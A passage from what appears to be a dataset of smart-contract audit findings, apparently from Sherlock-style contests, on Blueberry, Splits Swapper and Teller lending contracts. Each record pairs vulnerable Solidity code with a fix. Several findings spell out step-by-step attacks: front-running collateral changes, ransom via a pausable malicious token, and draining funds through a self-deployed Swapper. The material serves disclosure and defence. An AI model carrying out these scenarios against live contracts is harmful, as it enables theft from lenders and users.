joined.",It is hard to tell the intent of the developer from this check. Maybe the issue is simply that `poolAmountOut` should be the sum or the max value out of `poolAmountFromA` and `poolAmountFromB` instead of the min.,The rest of the function proceeds correctly without reverting. Users will think they joined the pool and are earning reward while they are not earning anything. This is a loss of funds to the user.,"```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n """",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n" +The protocol will not be able to add liquidity on the curve with another token with a balance.,medium,"The `CurveSpell` protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\nThe `openPositionFarm()` function enables user to open a leveraged position in a yield farming strategy by borrowing funds and using them to add liquidity to a Curve pool, while also taking into account certain risk management parameters such as maximum LTV and position size. When add liquidity on curve ,the protocol use the borrowed token and the collateral token, it checks the number of tokens in the pool and creates an array of the supplied token amounts to be passed to the add_liquidity function. Then the curve will transfer the tokens from the protocol and mint lp tokens to the protocol. However, the protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\n```\\n // 3. Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\n",Allow the curve pool to spend tokens that have a balance in the protocol to add liquidity,The protocol will not be able to add liquidity on the curve with another token with a balance.,"```\\n // 3. Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\n" +`getPositionRisk()` will return a wrong value of risk,medium,"In order to interact with SPELL the users need to `lend()` some collateral which is known as Isolated Collateral and the SoftVault will deposit them into Compound protocol to generate some lending interest (to earn passive yield)\\nto liquidate a position this function `isLiquidatable()` should return `true`\\n```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n\\nand it is subcall to `getPositionRisk()`\\n```\\n function getPositionRisk(\\n uint256 positionId\\n ) public view returns (uint256 risk) {\\n uint256 pv = getPositionValue(positionId); \\n uint256 ov = getDebtValue(positionId); \\n uint256 cv = getIsolatedCollateralValue(positionId);\\n\\n if (\\n (cv == 0 && pv == 0 && ov == 0) || pv >= ov // Closed position or Overcollateralized position\\n ) {\\n risk = 0;\\n } else if (cv == 0) {\\n // Sth bad happened to isolated underlying token\\n risk = Constants.DENOMINATOR;\\n } else {\\n risk = ((ov - pv) * Constants.DENOMINATOR) / cv;\\n }\\n }\\n```\\n\\nas we can see the `cv` is a critical value in terms of the calculation of `risk` the `cv` is returned by `getIsolatedCollateralValue()`\\n```\\n function getIsolatedCollateralValue(\\n uint256 positionId\\n ) public view override returns (uint256 icollValue) {\\n Position memory pos = positions[positionId];\\n // NOTE: exchangeRateStored has 18 decimals.\\n uint256 underlyingAmount;\\n if (_isSoftVault(pos.underlyingToken)) {\\n underlyingAmount = \\n (ICErc20(banks[pos.debtToken].bToken).exchangeRateStored() * \\n pos.underlyingVaultShare) /\\n Constants.PRICE_PRECISION; \\n } else {\\n underlyingAmount = pos.underlyingVaultShare;\\n }\\n icollValue = oracle.getTokenValue(\\n pos.underlyingToken,\\n underlyingAmount\\n );\\n }\\n```\\n\\nand it uses `exchangeRateStored()` to ask Compound (CToken.sol) for the exchange rate from `CToken` contract\\n```\\nThis function does not accrue interest before calculating the exchange rate\\n```\\n\\nso the `getPositionRisk()` will return a wrong value of risk because the interest does not accrue for this position",You shoud use `exchangeRateCurrent()` to Accrue interest first.,the user (position) could get liquidated even if his position is still healthy,```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n +BlueBerryBank#getPositionValue causes DOS if reward token is added that doens't have an oracle,medium,"collToken.pendingRewards pulls the most recent reward list from Aura/Convex. In the event that reward tokens are added to pools that don't currently have an oracle then it will DOS every action (repaying, liquidating, etc.). While this is only temporary it prevents liquidation which is a key process that should have 100% uptime otherwise the protocol could easily be left with bad debt.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nUsing the pendingRewards method pulls a fresh list of all tokens. When a token is added as a reward but can't be priced then the call to getTokenValue will revert. Since getPostionValue is used in liquidations, it temporarily breaks liquidations which in a volatile market can cause bad debt to accumulate.",Return zero valuation if extra reward token can't be priced.,Temporary DOS to liquidations which can result in bad debt,"```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n" +asking for the wrong address for `balanceOf()`,medium,"ShortLongSpell.openPosition() pass to `_doPutCollateral()` wrong value of `balanceOf()`\\n```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nthe balance should be of `address(vault)`","```\\n // 5. Put collateral // Remove the line below\\n strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n// Remove the line below\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n// Remove the line below\\n address(this)\\n// Add the line below\\n IERC20Upgradeable(vault).balanceOf(address(this))\\n )\\n );\\n```\\n",`openPosition()` will never work,"```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n" +AuraSpell#closePositionFarm requires users to swap all reward tokens through same router,medium,"AuraSpell#closePositionFarm requires users to swap all reward tokens through same router. This is problematic as it is very unlikely that a UniswapV2 router will have good liquidity sources for all tokens and will result in users experiencing forced losses to their reward token.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAll tokens are forcibly swapped through a single router.",Issue AuraSpell#closePositionFarm requires users to swap all reward tokens through same router\\nAllow users to use an aggregator like paraswap or multiple routers instead of only one single UniswapV2 router.,Users will be forced to swap through a router even if it doesn't have good liquidity for all tokens,"```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n" +rewardTokens removed from WAuraPool/WConvexPools will be lost forever,medium,"pendingRewards pulls a fresh count of reward tokens each time it is called. This is problematic if reward tokens are ever removed from the the underlying Aura/Convex pools because it means that they will no longer be distributed and will be locked in the contract forever.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\nIn the lines above we can see that only tokens that are currently available on the pool. This means that if tokens are removed then they are no longer claimable and will be lost to those entitled to shares.",Reward tokens should be stored with the tokenID so that it can still be paid out even if it the extra rewardToken is removed.,Users will lose reward tokens if they are removed,"```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n" +"SwapperCallbackValidation doesn't do anything, opens up users to having contracts drained",medium,"The `SwapperCallbackValidation` library that is intended to be used by contracts performing swaps does not provide any protection. As a result, all functions intended to be used only in a callback setting can be called any time by any user. In the provided example of how they expect this library to be used, this would result in the opportunity for all funds to be stolen.\\nThe `SwapperCallbackValidation` library is intended to be used by developers to verify that their contracts are only called in a valid, swapper callback scenario. It contains the following function to be implemented:\\n```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n\\nThis function simply pings the `SwapperFactory` and confirms that the function call is coming from a verified swapper. If it is, we assume that it is from a legitimate callback.\\nFor an example of how this is used, see the (out of scope) UniV3Swap contract, which serves as a model for developers to build contracts to support Swappers.\\n```\\nSwapperImpl swapper = SwapperImpl(msg.sender);\\nif (!swapperFactory.verifyCallback(swapper)) {\\n revert Unauthorized();\\n}\\n```\\n\\nThe contract goes on to perform swaps (which can be skipped by passing empty exactInputParams), and then sends all its ETH (or ERC20s) to `msg.sender`. Clearly, this validation is very important to protect such a contract from losing funds.\\nHowever, if we look deeper, we can see that this validation is not nearly sufficient.\\nIn fact, `SwapperImpl` inherits from `WalletImpl`, which contains the following function:\\n```\\nfunction execCalls(Call[] calldata calls_)\\n external\\n payable\\n onlyOwner\\n returns (uint256 blockNumber, bytes[] memory returnData)\\n{\\n blockNumber = block.number;\\n uint256 length = calls_.length;\\n returnData = new bytes[](length);\\n\\n bool success;\\n for (uint256 i; i < length;) {\\n Call calldata calli = calls_[i];\\n (success, returnData[i]) = calli.to.call{value: calli.value}(calli.data);\\n require(success, string(returnData[i]));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n emit ExecCalls(calls_);\\n}\\n```\\n\\nThis function allows the owner of the Swapper to perform arbitrary calls on its behalf.\\nSince the verification only checks that the caller is, in fact, a Swapper, it is possible for any user to create a Swapper and pass arbitrary calldata into this `execCalls()` function, performing any transaction they would like and passing the `verifyCallback()` check.\\nIn the generic case, this makes the `verifyCallback()` function useless, as any calldata that could be called without that function could similarly be called by deploying a Swapper and sending identical calldata through that Swapper.\\nIn the specific case based on the example provided, this would allow a user to deploy a Swapper, call the `swapperFlashCallback()` function directly (not as a callback), and steal all the funds held by the contract.","Issue SwapperCallbackValidation doesn't do anything, opens up users to having contracts drained\\nI do not believe that Swappers require the ability to execute arbitrary calls, so should not inherit from WalletImpl.\\nAlternatively, the verification checks performed by contracts accepting callbacks should be more substantial — specifically, they should store the Swapper they are interacting with's address for the duration of the transaction, and only allow callbacks from that specific address.","All funds can be stolen from any contracts using the `SwapperCallbackValidation` library, because the `verifyCallback()` function provides no protection.","```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n" +Swapper mechanism cannot incentivize ETH-WETH swaps without risking owner funds,medium,"When `flash()` is called on the Swapper contract, pairs of tokens are passed in consisting of (a) a base token, which is currently held by the contract and (b) a quote token, which is the `$tokenToBeneficiary` that the owner would like to receive.\\nThese pairs are passed to the oracle to get the quoted value of each of them:\\n```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n\\nThe `UniV3OracleImpl.sol` contract returns a quote per pair of tokens. However, since Uniswap pools only consist of WETH (not ETH) and are ordered by token address, it performs two conversions first: `_convert()` converts ETH to WETH for both base and quote tokens, and `_sort()` orders the pairs by token address.\\n```\\nConvertedQuotePair memory cqp = quoteParams_.quotePair._convert(_convertToken);\\nSortedConvertedQuotePair memory scqp = cqp._sort();\\n```\\n\\nThe oracle goes on to check for pair overrides, and gets the `scaledOfferFactor` for the pair being quoted:\\n```\\nPairOverride memory po = _getPairOverride(scqp);\\nif (po.scaledOfferFactor == 0) {\\n po.scaledOfferFactor = $defaultScaledOfferFactor;\\n}\\n```\\n\\nThe `scaledOfferFactor` is the discount being offered through the Swapper to perform the swap. The assumption is that this will be set to a moderate amount (approximately 5%) to incentivize bots to perform the swaps, but will be overridden with a value of ~0% for the same tokens, to ensure that bots aren't paid for swaps they don't need to perform.\\nThe problem is that these overrides are set on the `scqp` (sorted, converted tokens), not the actual token addresses. For this reason, ETH and WETH are considered identical in terms of overrides.\\nTherefore, Swapper owners who want to be paid out in ETH (ie where $tokenToBeneficiary = ETH) have two options:\\nThey can set the WETH-WETH override to 0%, which successfully stops bots from earning a fee on ETH-ETH trades, but will not provide any incentive for bots to swap WETH in the swapper into ETH. This makes the Swapper useless for WETH.\\nThey can keep the WETH-WETH pair at the original ~5%, which will incentivize WETH-ETH swaps, but will also pay 5% to bots for doing nothing when they take ETH out of the contract and return ETH. This makes the Swapper waste user funds.\\nThe same issues exist going in the other direction, when `$tokenToBeneficiary = WETH`.","The `scaledOfferFactor` (along with its overrides) should be stored on the Swapper, not on the Oracle.\\nIn order to keep the system modular and logically organized, the Oracle should always return the accurate price for the `scqp`. Then, it is the job of the Swapper to determine what discount is offered for which asset.\\nThis will allow values to be stored in the actual `base` and `quote` assets being used, and not in their converted, sorted counterparts.",Users who want to be paid out in ETH or WETH will be forced to either (a) have the Swapper not function properly for a key pair or (b) pay bots to perform useless actions.,```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n +CollateralManager#commitCollateral can be called on an active loan,high,"CollateralManager#commitCollateral never checks if the loan has been accepted allowing users to add collaterals after which can DOS the loan.\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue never checks that loan isn't active\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral does not contain any check that the bidId is pending or at least that it isn't accepted. This means that collateral can be committed to an already accepted bid, modifying bidCollaterals.\\n```\\nfunction _withdraw(uint256 _bidId, address _receiver) internal virtual {\\n for (\\n uint256 i;\\n i < _bidCollaterals[_bidId].collateralAddresses.length();\\n i++\\n ) {\\n // Get collateral info\\n Collateral storage collateralInfo = _bidCollaterals[_bidId]\\n .collateralInfo[\\n _bidCollaterals[_bidId].collateralAddresses.at(i)\\n ];\\n // Withdraw collateral from escrow and send it to bid lender\\n ICollateralEscrowV1(_escrows[_bidId]).withdraw(\\n collateralInfo._collateralAddress,\\n collateralInfo._amount,\\n _receiver\\n );\\n```\\n\\nbidCollaterals is used to trigger the withdrawal from the escrow to the receiver, which closing the loan and liquidations. This can be used to DOS a loan AFTER it has already been filled.\\nUser A creates a bid for 10 ETH against 50,000 USDC at 10% APR\\nUser B sees this bid and decides to fill it\\nAfter the loan is accepted, User A calls CollateralManager#commitCollateral with a malicious token they create\\nUser A doesn't pay their loan and it becomes liquidatable\\nUser B calls liquidate but it reverts when the escrow attempts to transfer out the malicious token\\nUser A demands a ransom to return the funds\\nUser A enables the malicious token transfer once the ransom is paid",CollateralManager#commitCollateral should revert if loan is active.,Loans can be permanently DOS'd even after being accepted,"```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue never checks that loan isn't active\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n" +CollateralManager#commitCollateral can be called by anyone,high,"CollateralManager#commitCollateral has no access control allowing users to freely add malicious tokens to any bid\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral has no access control and can be called by anyone on any bidID. This allows an attacker to front-run lenders and add malicious tokens to a loan right before it is filled.\\nA malicious user creates a malicious token that can be transferred once before being paused and returns uint256.max for balanceOf\\nUser A creates a loan for 10e18 ETH against 50,000e6 USDC at 10% APR\\nUser B decides to fill this loan and calls TellerV2#lenderAcceptBid\\nThe malicious user sees this and front-runs with a CollateralManager#commitCollateral call adding the malicious token\\nMalicious token is now paused breaking both liquidations and fully paying off the loan\\nMalicious user leverages this to ransom the locked tokens, unpausing when it is paid","Cause CollateralManager#commitCollateral to revert if called by anyone other than the borrower, their approved forwarder or TellerV2",User can add malicious collateral calls to any bid they wish,"```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n" +CollateralManager#commitCollateral overwrites collateralInfo._amount if called with an existing collateral,high,"When duplicate collateral is committed, the collateral amount is overwritten with the new value. This allows borrowers to front-run bid acceptance to change their collateral and steal from lenders.\\nCollateralManager.sol#L426-L442\\n```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n\\nWhen a duplicate collateral is committed it overwrites the collateralInfo for that token, which is used to determine how much collateral to escrow from the borrower.\\nTellerV2.sol#L470-L484\\n```\\nfunction lenderAcceptBid(uint256 _bidId)\\n external\\n override\\n pendingBid(_bidId, ""lenderAcceptBid"")\\n whenNotPaused\\n returns (\\n uint256 amountToProtocol,\\n uint256 amountToMarketplace,\\n uint256 amountToBorrower\\n )\\n{\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n```\\n\\nTellerV2#lenderAcceptBid only allows the lender input the bidId of the bid they wish to accept, not allowing them to specify the expected collateral. This allows lenders to be honeypot and front-run causing massive loss of funds:\\nMalicious user creates and commits a bid to take a loan of 10e18 ETH against 100,000e6 USDC with 15% APR\\nLender sees this and calls TellerV2#lenderAcceptBid\\nMalicious user front-runs transaction with commitCollateral call setting USDC to 1\\nBid is filled sending malicious user 10e18 ETH and escrowing 1 USDC\\nAttacker doesn't repay loan and has stolen 10e18 ETH for the price of 1 USDC",Allow lender to specify collateral info and check that it matches the committed addresses and amounts,Bid acceptance can be front-run to cause massive losses to lenders,"```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n" +_repayLoan will fail if lender is blacklisted,high,"The internal function that repays a loan `_repayLoan` attempts to transfer the loan token back to the lender. If the loan token implements a blacklist like the common USDC token, the transfer may be impossible and the repayment will fail.\\nThis internal `_repayLoan` function is called during any partial / full repayment and during liquidation.\\nThe function to repay the loan to the lender directly transfers the token to the lender:\\n```\\n function _repayLoan(// rest of code) internal virtual {\\n // rest of code\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n // rest of code\\n```\\n\\nAny of these functions will fail if loan lender is blacklisted by the token.\\nDuring repayment the loan lender is computed by:\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\n\\nIf the lender controls a blacklisted address, they can use the lenderManager to selectively transfer the loan to / from the blacklisted whenever they want.","Use a push/pull pattern for transferring tokens. Allow repayment of loan and withdraw the tokens of the user into `TellerV2` (or an escrow) and allow lender to withdraw the repayment from `TellerV2` (or the escrow). This way, the repayment will fail only if `TellerV2` is blacklisted.","Any lender can prevent repayment of a loan and its liquidation. In particular, a lender can wait until a loan is almost completely repaid, transfer the loan to a blacklisted address (even one they do not control) to prevent the loan to be fully repaid / liquidated. The loan will default and borrower will not be able to withdraw their collateral.\\nThis result in a guaranteed griefing attack on the collateral of a user.\\nIf the lender controls a blacklisted address, they can additionally withdraw the collateral of the user.\\nI believe the impact is high since the griefing attack is always possible whenever lent token uses a blacklist, and results in a guaranteed loss of collateral.","```\\n function _repayLoan(// rest of code) internal virtual {\\n // rest of code\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n // rest of code\\n```\\n" +Malicious user can abuse UpdateCommitment to create commitments for other users,high,"UpdateCommitment checks that the original lender is msg.sender but never validates that the original lender == new lender. This allows malicious users to effectively create a commitment for another user, allowing them to drain funds from them.\\nLenderCommitmentForwarder.sol#L208-L224\\n```\\nfunction updateCommitment(\\n uint256 _commitmentId,\\n Commitment calldata _commitment\\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\\n\\n validateCommitment(commitments[_commitmentId]);\\n```\\n\\nUpdateCommitment is intended to allow users to update their commitment but due to lack of verification of _commitment.lender, a malicious user create a commitment then update it to a new lender. By using bad loan parameters they can steal funds from the attacker user.",Check that the update lender is the same the original lender,UpdateCommitment can be used to create a malicious commitment for another user and steal their funds,"```\\nfunction updateCommitment(\\n uint256 _commitmentId,\\n Commitment calldata _commitment\\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\\n\\n validateCommitment(commitments[_commitmentId]);\\n```\\n" +lender could be forced to withdraw collateral even if he/she would rather wait for liquidation during default,medium,"lender could be forced to withdraw collateral even if he/she would rather wait for liquidation during default\\nCollateralManager.withdraw would pass if the loan is defaulted (the borrower does not pay interest in time); in that case, anyone can trigger an withdrawal on behalf of the lender before the liquidation delay period passes.\\nwithdraw logic from CollateralManager.\\n```\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(""WITHDRAW %d"", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(""collateral cannot be withdrawn"");\\n }\\n }\\n```\\n","check that the caller is the lender\\n```\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(""WITHDRAW %d"", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n+++ uint256 _marketplaceId = bidState.marketplaceId; \\n+++ address sender = _msgSenderForMarket(_marketplaceId); \\n+++ address lender = tellerV2.getLoanLender(_bidId); \\n+++ require(sender == lender, ""sender must be the lender""); \\n _withdraw(_bidId, lender);\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(""collateral cannot be withdrawn"");\\n }\\n }\\n```\\n","anyone can force lender to take up collateral during liquidation delay and liquidation could be something that never happen. This does not match the intention based on the spec which implies that lender has an option: `3) When the loan is fully repaid, the borrower can withdraw the collateral. If the loan becomes defaulted instead, then the lender has a 24 hour grace period to claim the collateral (losing the principal)`","```\\n * @notice Withdraws deposited 